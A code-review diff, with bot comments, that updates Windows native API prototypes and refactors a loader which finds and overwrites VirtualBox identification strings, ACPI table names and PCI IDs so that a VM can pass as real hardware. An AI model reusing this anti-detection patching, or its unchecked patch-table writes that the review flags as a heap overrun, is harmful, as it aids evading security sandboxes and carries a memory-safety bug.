- _In_ ACCESS_MASK DesiredAccess,
- _In_ LPVOID ObjectAttributes,
- _In_ HANDLE ProcessHandle,
- _In_ LPTHREAD_START_ROUTINE lpStartAddress,
- _In_ LPVOID lpParameter,
- _In_ BOOL CreateSuspended,
- _In_ DWORD StackZeroBits,
- _In_ DWORD SizeOfStackCommit,
- _In_ DWORD SizeOfStackReserve,
- _Out_ LPVOID lpBytesBuffer);
+ _Out_ PHANDLE ThreadHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ProcessHandle,
+ _In_ PVOID StartRoutine,
+ _In_opt_ PVOID Argument,
+ _In_ ULONG CreateFlags, //THREAD_CREATE_FLAGS_*
+ _In_opt_ ULONG_PTR ZeroBits,
+ _In_opt_ SIZE_T StackSize,
+ _In_opt_ SIZE_T MaximumStackSize,
+ _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);
 
 NTSYSAPI
 ULONG
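Review bot: The corrected `NtCreateThreadEx` prototype changes the meaning of the seventh argument from `BOOL CreateSuspended` to `ULONG CreateFlags` and of the last from an `_Out_ LPVOID lpBytesBuffer` to `_In_opt_ PPS_ATTRIBUTE_LIST AttributeList`; existing callers keep compiling because the widths are compatible, so each call site has to be audited by hand rather than trusted to the compiler. The `//THREAD_CREATE_FLAGS_*` trailer points at definitions not visible in this diff; if they are not declared elsewhere in the header, place them next to the prototype so the comment resolves to something. `ZeroBits`, `StackSize` and `MaximumStackSize` are `_In_opt_` integers, which SAL reads as "zero means unspecified"; a short comment saying that 0 selects the defaults would spare the next reader the question.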
@@ -10305,6 +10934,77 @@ NtCreatePagingFile( * ************************************************************************************/ +typedef struct _PORT_VIEW { + ULONG Length; + HANDLE SectionHandle; + ULONG SectionOffset; + SIZE_T ViewSize; + PVOID ViewBase; + PVOID ViewRemoteBase; +} PORT_VIEW, *PPORT_VIEW; + +typedef struct _REMOTE_PORT_VIEW { + ULONG Length; + SIZE_T ViewSize; + PVOID ViewBase; +} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW; + +typedef struct _PORT_MESSAGE { + union { + struct { + CSHORT DataLength; + CSHORT TotalLength; + } s1; + ULONG Length; + } u1; + union { + struct { + CSHORT Type; + CSHORT DataInfoOffset; + } s2; + ULONG ZeroInit; + } u2; + union { + CLIENT_ID ClientId; + double DoNotUseThisField; // Force quadword alignment + } u3; + ULONG MessageId; + union { + ULONG ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message + ULONG CallbackId; // Only valid on LPC_REQUEST message + } u4; + UCHAR Reserved[8]; +} PORT_MESSAGE, *PPORT_MESSAGE; + +typedef struct _PORT_DATA_ENTRY { + PVOID Base; + ULONG Size; +} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY; + +typedef struct _PORT_DATA_INFORMATION { + ULONG CountDataEntries; + PORT_DATA_ENTRY DataEntries[1]; +} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION; + +#define LPC_REQUEST 1 +#define LPC_REPLY 2 +#define LPC_DATAGRAM 3 +#define LPC_LOST_REPLY 4 +#define LPC_PORT_CLOSED 5 +#define LPC_CLIENT_DIED 6 +#define LPC_EXCEPTION 7 +#define LPC_DEBUG_EVENT 8 +#define LPC_ERROR_EVENT 9 +#define LPC_CONNECTION_REQUEST 10 + +#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE) +#define PORT_MAXIMUM_MESSAGE_LENGTH 256 + +typedef struct _LPC_CLIENT_DIED_MSG { + PORT_MESSAGE PortMsg; + LARGE_INTEGER CreateTime; +} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG; + NTSYSAPI NTSTATUS NTAPI 
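Review bot: `PORT_DATA_INFORMATION` declares its trailing array as `PORT_DATA_ENTRY DataEntries[1]`, while the other variable-length structures added in this diff (`SL_CACHE`, `SL_APPX_CACHE`) use `ANYSIZE_ARRAY`; `PORT_DATA_ENTRY DataEntries[ANYSIZE_ARRAY];` keeps one idiom for the same value. `PORT_MAXIMUM_MESSAGE_LENGTH 256` and the `LPC_*` message types carry no comment; a one-liner on whether the limit covers the `PORT_MESSAGE` header or only the payload — confirm which — is what a caller sizing a receive buffer needs. The alignment comment on `DoNotUseThisField` is good; `Reserved[8]` would benefit from the same kind of note.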
@@ -10709,6 +11409,26 @@ NtTraceControl( _In_ ULONG OutBufferLen, _Out_ PULONG ReturnLength); +/************************************************************************************ +* +* Enclave API. +* +************************************************************************************/ + +NTSYSAPI +NTSTATUS +NTAPI +NtLoadEnclaveData( + _In_ HANDLE ProcessHandle, + _In_ PVOID BaseAddress, + _In_reads_bytes_(BufferSize) PVOID Buffer, + _In_ SIZE_T BufferSize, + _In_ ULONG Protect, + _In_reads_bytes_(PageInformationLength) PVOID PageInformation, + _In_ ULONG PageInformationLength, + _Out_opt_ PSIZE_T NumberOfBytesWritten, + _Out_opt_ PULONG EnclaveError); + /************************************************************************************ * * Kernel Debugger API. diff --git a/Source/Zekamashi/loader/oscompat.manifest b/Source/Zekamashi_v2/loader/oscompat.manifest similarity index 100% rename from Source/Zekamashi/loader/oscompat.manifest rename to Source/Zekamashi_v2/loader/oscompat.manifest diff --git a/Source/Zekamashi/loader/patterns.c b/Source/Zekamashi_v2/loader/patterns.c similarity index 62% rename from Source/Zekamashi/loader/patterns.c rename to Source/Zekamashi_v2/loader/patterns.c index c05a131..1a95753 100644 --- a/Source/Zekamashi/loader/patterns.c +++ b/Source/Zekamashi_v2/loader/patterns.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2019 +* (C) COPYRIGHT AUTHORS, 2014 - 2020 * * TITLE: PATTERNS.C * -* VERSION: 1.100 +* VERSION: 2.00 * -* DATE: 04 Jan 2019 +* DATE: 24 Jan 2020 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 
@@ -17,46 +17,9 @@ #include "global.h" #define MAX_HWID_BLOCKS_DEEP 32 -#define MAX_PATCH_BLOCKS 256 +#define MAX_PATCH_BLOCKS 64 -BINARY_PATCH_BLOCK_INTERNAL *DataBlocks; - -/* -* FindPattern -* -* Purpose: -* -* Lookup pattern in buffer. -* -*/ -PVOID FindPattern( - CONST PBYTE Buffer, - SIZE_T BufferSize, - CONST PBYTE Pattern, - SIZE_T PatternSize -) -{ - PBYTE p = Buffer; - - if (PatternSize == 0) - return NULL; - if (BufferSize < PatternSize) - return NULL; - BufferSize -= PatternSize; - - do { - p = memchr(p, Pattern[0], BufferSize - (p - Buffer)); - if (p == NULL) - break; - - if (memcmp(p, Pattern, PatternSize) == 0) - return p; - - p++; - } while (BufferSize - (p - Buffer) > 0); - - return NULL; -} +BINARY_PATCH_BLOCK_INTERNAL* DataBlocks; /* * BuildTable @@ -67,10 +30,10 @@ PVOID FindPattern( * */ BOOL BuildTable( - _In_ BINARY_PATCH_BLOCK_INTERNAL *PatchBlock, + _In_ BINARY_PATCH_BLOCK_INTERNAL* PatchBlock, _In_ UINT BlockCount, - _In_ PVOID *OutputBuffer, - _Inout_opt_ DWORD *OutputBufferSize + _In_ PVOID* OutputBuffer, + _Inout_opt_ DWORD* OutputBufferSize ) { UINT i; @@ -83,7 +46,7 @@ BOOL BuildTable( return FALSE; TableSize = BlockCount * sizeof(BINARY_PATCH_BLOCK_INTERNAL); - Table = (PUCHAR)RtlAllocateHeap(GetProcessHeap(), HEAP_ZERO_MEMORY, TableSize); + Table = (PUCHAR)supHeapAlloc(TableSize); if (Table) { ProcessedSize = 0; for (i = 0; i < BlockCount; i++) { @@ -95,7 +58,7 @@ BOOL BuildTable( } //error converting table, entries are missing if (i != BlockCount) { - RtlFreeHeap(GetProcessHeap(), 0, Table); + supHeapFree(Table); return FALSE; } @@ -110,6 +73,10 @@ BOOL BuildTable( return bResult; } +#define PATTERN_FOUND(s, x) { printf_s("%s\t\t0x%lx\r\n", s, x);} +#define PATTERN_FOUND2(s, x) { printf_s("%s\t0x%lx\r\n", s, x);} + +#define PATTERN_NOT_FOUND(s) { printf_s("Pattern %s was not found\r\n", s); } /* * ProcessVirtualBoxFile 
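Review bot: `MAX_PATCH_BLOCKS` drops from 256 to 64 and sizes the `DataBlocks` array that `ProcessVirtualBoxFile` fills through the running index `c` (`DataBlocks[c].VirtualOffset = ...; c += 1;`), but no comparison of `c` against `MAX_PATCH_BLOCKS` is visible anywhere in this diff; the 6.1+ pattern variants added below increase the number of stores, and `MAX_HWID_BLOCKS_DEEP 32` suggests the HWID pass adds more. A guard before each store, e.g. `if (c >= MAX_PATCH_BLOCKS) { printf_s("patch table full\r\n"); break; }`, or a small helper that performs the store and checks the bound once, turns a silent heap overrun into a reported failure. `FindPattern` is removed here and the call sites now use `supFindPattern`; a comment noting that the replacement must keep the same "first match or NULL" contract would help, since every store below relies on it.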
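Review bot: `PATTERN_FOUND`, `PATTERN_FOUND2` and `PATTERN_NOT_FOUND` expand to a bare `{ ... }` block, so `PATTERN_FOUND(...);` leaves a stray `;` and an un-braced `if (x) PATTERN_FOUND(...); else ...` will not compile; `#define PATTERN_NOT_FOUND(s) do { printf_s("Pattern %s was not found\r\n", s); } while (0)` is the usual form. The label is a free-form string retyped by hand in the found and not-found branches, which is how the miss branch for the 6.1+ RSDT pattern later in this file ends up printing `"RSDT (pre 6.1+)"`; binding each pattern to a single label (a table of pattern/patch/offset/label entries driven by one loop) removes the duplication and the run of near-identical blocks.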
@@ -121,12 +88,11 @@ BOOL BuildTable( */ UINT ProcessVirtualBoxFile( _In_ LPTSTR lpszPath, - _In_ PVOID *OutputBuffer, - _Inout_opt_ DWORD *OutputBufferSize + _In_ PVOID* OutputBuffer, + _Inout_opt_ DWORD* OutputBufferSize ) { UINT uResult = (UINT)-1; - BOOL cond = FALSE; ULONG c = 0, d = 0; HANDLE fh = NULL, sec = NULL; @@ -137,8 +103,6 @@ UINT ProcessVirtualBoxFile( PBYTE DllBase = NULL, Pattern; SIZE_T DllVirtualSize; - TCHAR LogBuffer[MAX_PATH]; - RtlSecureZeroMemory(&usFileName, sizeof(usFileName)); do { 
@@ -169,303 +133,319 @@ UINT ProcessVirtualBoxFile( if (!NT_SUCCESS(status)) break; - DataBlocks = (BINARY_PATCH_BLOCK_INTERNAL*)RtlAllocateHeap(GetProcessHeap(), HEAP_ZERO_MEMORY, - sizeof(BINARY_PATCH_BLOCK_INTERNAL) * MAX_PATCH_BLOCKS); + DataBlocks = (BINARY_PATCH_BLOCK_INTERNAL*)supHeapAlloc(sizeof(BINARY_PATCH_BLOCK_INTERNAL) * MAX_PATCH_BLOCKS); if (DataBlocks == NULL) break; c = 0; //locate VBOX patterns - cuiPrintText(TEXT("\r\nPattern matching: 'VBOX'\r\n"), TRUE); + printf_s("\r\n%s\r\n\r\n", "Pattern matching: 'VBOX'"); // // FACP // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)FACP_PATTERN, sizeof(FACP_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(4 + Pattern - DllBase); DataBlocks[c].DataLength = sizeof(VBOX_PATCH); RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("FACP\t\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND("FACP (pre v6.1)", (ULONG)DataBlocks[c].VirtualOffset); + c += 1; + } + else { + PATTERN_NOT_FOUND("FACP (pre v6.1)"); + } + + Pattern = supFindPattern( + (CONST PBYTE)DllBase, DllVirtualSize, + (CONST PBYTE)FACP_PATTERN_61, sizeof(FACP_PATTERN_61)); + if (Pattern) { + DataBlocks[c].VirtualOffset = (ULONG)(4 + Pattern - DllBase); + DataBlocks[c].DataLength = sizeof(VBOX_PATCH); + RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength); + PATTERN_FOUND("FACP (v6.1+)", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern FACP not found")); + PATTERN_NOT_FOUND("FACP (v6.1+)"); } - cuiPrintText(LogBuffer, TRUE); // // RSDT // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)RSDT_PATTERN, sizeof(RSDT_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = 
(ULONG)(3 + Pattern - DllBase); DataBlocks[c].DataLength = sizeof(VBOX_PATCH); RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("RSDT\t\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND("RSDT (pre 6.1)", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern RSDT not found")); + PATTERN_NOT_FOUND("RSDT (pre 6.1)"); + } + + Pattern = supFindPattern( + (CONST PBYTE)DllBase, DllVirtualSize, + (CONST PBYTE)RSDT_PATTERN_61, sizeof(RSDT_PATTERN_61)); + if (Pattern) { + DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase); + DataBlocks[c].DataLength = sizeof(VBOX_PATCH); + RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength); + PATTERN_FOUND("RSDT (6.1+)", (ULONG)DataBlocks[c].VirtualOffset); + c += 1; + } + else { + PATTERN_NOT_FOUND("RSDT (pre 6.1+)"); } - cuiPrintText(LogBuffer, TRUE); // // XSDT // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)XSDT_PATTERN, sizeof(XSDT_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase); DataBlocks[c].DataLength = sizeof(VBOX_PATCH); RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("XSDT\t\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND("XSDT", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern XSDT not found")); + PATTERN_NOT_FOUND("XSDT"); } - cuiPrintText(LogBuffer, TRUE); // // APIC // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)APIC_PATTERN, sizeof(APIC_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase); DataBlocks[c].DataLength = sizeof(VBOX_PATCH); 
RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("APIC\t\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND("APIC", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern APIC not found")); + PATTERN_NOT_FOUND("APIC"); } - cuiPrintText(LogBuffer, TRUE); // // HPET // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)HPET_PATTERN, sizeof(HPET_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase); DataBlocks[c].DataLength = sizeof(VBOX_PATCH); RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("HPET\t\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND("HPET", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern HPET not found")); + PATTERN_NOT_FOUND("HPET"); } - cuiPrintText(LogBuffer, TRUE); // // MCFG // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)MCFG_PATTERN, sizeof(MCFG_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase); DataBlocks[c].DataLength = sizeof(VBOX_PATCH); RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("MCFG\t\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND("MCFG", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern MCFG not found")); + PATTERN_NOT_FOUND("MCFG"); } - cuiPrintText(LogBuffer, TRUE); // // VBOXCPU // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)VBOXCPU_PATTERN, 
sizeof(VBOXCPU_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(2 + Pattern - DllBase); DataBlocks[c].DataLength = sizeof(VBOX_PATCH); RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("VBOXCPU\t\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND("VBOXCPU", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern VBOXCPU not found")); + PATTERN_NOT_FOUND("VBOXCPU"); } - cuiPrintText(LogBuffer, TRUE); // // VBOX 1.0 CDROM // - /*RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + /* + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)CDROMVBOX_PATTERN, sizeof(CDROMVBOX_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(12 + Pattern - DllBase); DataBlocks[c].DataLength = sizeof(VBOX_PATCH); RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("VBOXCDROM\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND("VBOXCDOM", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern VBOXCDROM not found")); + PATTERN_NOT_FOUND("VBOXCDROM"); } - cuiPrintText(LogBuffer, TRUE);*/ + */ // // VBOX generic // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)JUSTVBOX_PATTERN, sizeof(JUSTVBOX_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase); DataBlocks[c].DataLength = sizeof(VBOX_PATCH); RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("VBOX\t\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND("VBOX (pre 6.1)", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern VBOX generic not found")); + 
PATTERN_NOT_FOUND("VBOX generic (pre 6.1)"); + } + + Pattern = supFindPattern( + (CONST PBYTE)DllBase, DllVirtualSize, + (CONST PBYTE)JUSTVBOX_PATTERN_61, sizeof(JUSTVBOX_PATTERN_61)); + if (Pattern) { + DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase); + DataBlocks[c].DataLength = sizeof(VBOX_PATCH); + RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength); + PATTERN_FOUND("VBOX (6.1+)", (ULONG)DataBlocks[c].VirtualOffset); + c += 1; + } + else { + PATTERN_NOT_FOUND("VBOX generic (6.1+)"); } - cuiPrintText(LogBuffer, TRUE); //locate VirtualBox pattern - cuiPrintText(TEXT("\r\nPattern matching: 'VirtualBox'\r\n"), TRUE); + printf_s("\r\n%s\r\n\r\n", "Pattern matching: 'VirtualBox'"); // // 'VirtualBox' // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)JUSTVIRTUALBOX_PATTERN, sizeof(JUSTVIRTUALBOX_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase); DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH); RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("VirtualBox\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND2("VirtualBox", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern VirtualBox not found")); + PATTERN_NOT_FOUND("VirtualBox"); } - cuiPrintText(LogBuffer, TRUE); // // 'VirtualBox__' // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)VIRTUALBOX2020_PATTERN, sizeof(VIRTUALBOX2020_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase); DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH); RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("VirtualBox__\t0x")); 
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND2("VirtualBox__", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern VirtualBox__ not found")); + PATTERN_NOT_FOUND("VirtualBox__"); } - cuiPrintText(LogBuffer, TRUE); // // 'VirtualBox GIM' // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)VIRTUALBOXGIM_PATTERN, sizeof(VIRTUALBOXGIM_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase); DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH); RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("VirtualBox GIM\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND2("VirtualBox GIM", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tVirtualBox GIM pattern not found")); + PATTERN_NOT_FOUND("VirtualBox GIM"); } - cuiPrintText(LogBuffer, TRUE); // // 'VirtualBox VMM' // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)VIRTUALBOXVMM_PATTERN, sizeof(VIRTUALBOXVMM_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase); DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH); RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("VirtualBox VMM\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND2("VirtualBox VMM", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern VirtualBox VMM not found")); + PATTERN_NOT_FOUND("VirtualBox VMM"); } - cuiPrintText(LogBuffer, TRUE); //locate Configuration pattern - cuiPrintText(TEXT("\r\nPattern matching: Configuration\r\n"), TRUE); + 
printf_s("\r\n%s\r\n\r\n", "Pattern matching: 'Configuration'"); - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)DllBase, DllVirtualSize, (CONST PBYTE)CFGSTRINGS_PATTERN, sizeof(CFGSTRINGS_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(26 + Pattern - DllBase); DataBlocks[c].DataLength = sizeof(CONFIGURATION_PATCH); RtlCopyMemory(DataBlocks[c].Data, CONFIGURATION_PATCH, DataBlocks[c].DataLength); - _strcpy(LogBuffer, TEXT("Cfg\t\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); + PATTERN_FOUND("Configuration (pre 6.1)", (ULONG)DataBlocks[c].VirtualOffset); + c += 1; + } + else { + PATTERN_NOT_FOUND("Configuration (pre 6.1)"); + } + + Pattern = supFindPattern( + (CONST PBYTE)DllBase, DllVirtualSize, + (CONST PBYTE)CFGSTRINGS_PATTERN_61, sizeof(CFGSTRINGS_PATTERN_61)); + if (Pattern) { + DataBlocks[c].VirtualOffset = (ULONG)(26 + Pattern - DllBase); + DataBlocks[c].DataLength = sizeof(CONFIGURATION_PATCH_61); + RtlCopyMemory(DataBlocks[c].Data, CONFIGURATION_PATCH_61, DataBlocks[c].DataLength); + PATTERN_FOUND("Configuration (6.1+)", (ULONG)DataBlocks[c].VirtualOffset); c += 1; } else { - _strcpy(LogBuffer, TEXT("\tPattern Configuration not found")); + PATTERN_NOT_FOUND("Configuration (6.1+)"); } - cuiPrintText(LogBuffer, TRUE); + // // HWID // - cuiPrintText(TEXT("\r\nPattern matching: Hardware ID\r\n"), TRUE); + printf_s("\r\n%s\r\n\r\n", "Pattern matching: Hardware ID"); // // 80EE 
@@ -473,21 +453,18 @@ UINT ProcessVirtualBoxFile( d = 0; Pattern = DllBase; do { - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)Pattern, DllVirtualSize - (Pattern - DllBase), (CONST PBYTE)PCI80EE_PATTERN, sizeof(PCI80EE_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(1 + Pattern - DllBase); DataBlocks[c].DataLength = sizeof(HWID_PATCH_VIDEO_1); RtlCopyMemory(DataBlocks[c].Data, HWID_PATCH_VIDEO_1, DataBlocks[c].DataLength); - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - _strcpy(LogBuffer, TEXT("80EE\t\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); - cuiPrintText(LogBuffer, TRUE); + PATTERN_FOUND("80EE", (ULONG)DataBlocks[c].VirtualOffset); c += 1; d += 1; if (d > MAX_HWID_BLOCKS_DEEP) { - cuiPrintText(TEXT("\r\nLdr: Maximum hwid blocks deep, abort scan.\r\n"), TRUE); + printf_s("\r\nLDR: Maximum hwid blocks deep, abort scan.\r\n"); break; } } @@ -501,25 +478,21 @@ UINT ProcessVirtualBoxFile( // BEEF // - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); d = 0; Pattern = DllBase; do { - Pattern = FindPattern( + Pattern = supFindPattern( (CONST PBYTE)Pattern, DllVirtualSize - (Pattern - DllBase), (CONST PBYTE)PCIBEEF_PATTERN, sizeof(PCIBEEF_PATTERN)); if (Pattern) { DataBlocks[c].VirtualOffset = (ULONG)(1 + Pattern - DllBase); DataBlocks[c].DataLength = sizeof(HWID_PATCH_VIDEO_2); RtlCopyMemory(DataBlocks[c].Data, HWID_PATCH_VIDEO_2, DataBlocks[c].DataLength); - RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer)); - _strcpy(LogBuffer, TEXT("BEEF\t\t0x")); - ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer)); - cuiPrintText(LogBuffer, TRUE); + PATTERN_FOUND("BEEF", (ULONG)DataBlocks[c].VirtualOffset); c += 1; d += 1; if (d > MAX_HWID_BLOCKS_DEEP) { - cuiPrintText(TEXT("\r\nLdr: Maximum hwid blocks deep, abort scan.\r\n"), TRUE); + printf_s("\r\nLDR: Maximum hwid blocks deep, abort scan.\r\n"); break; } } 
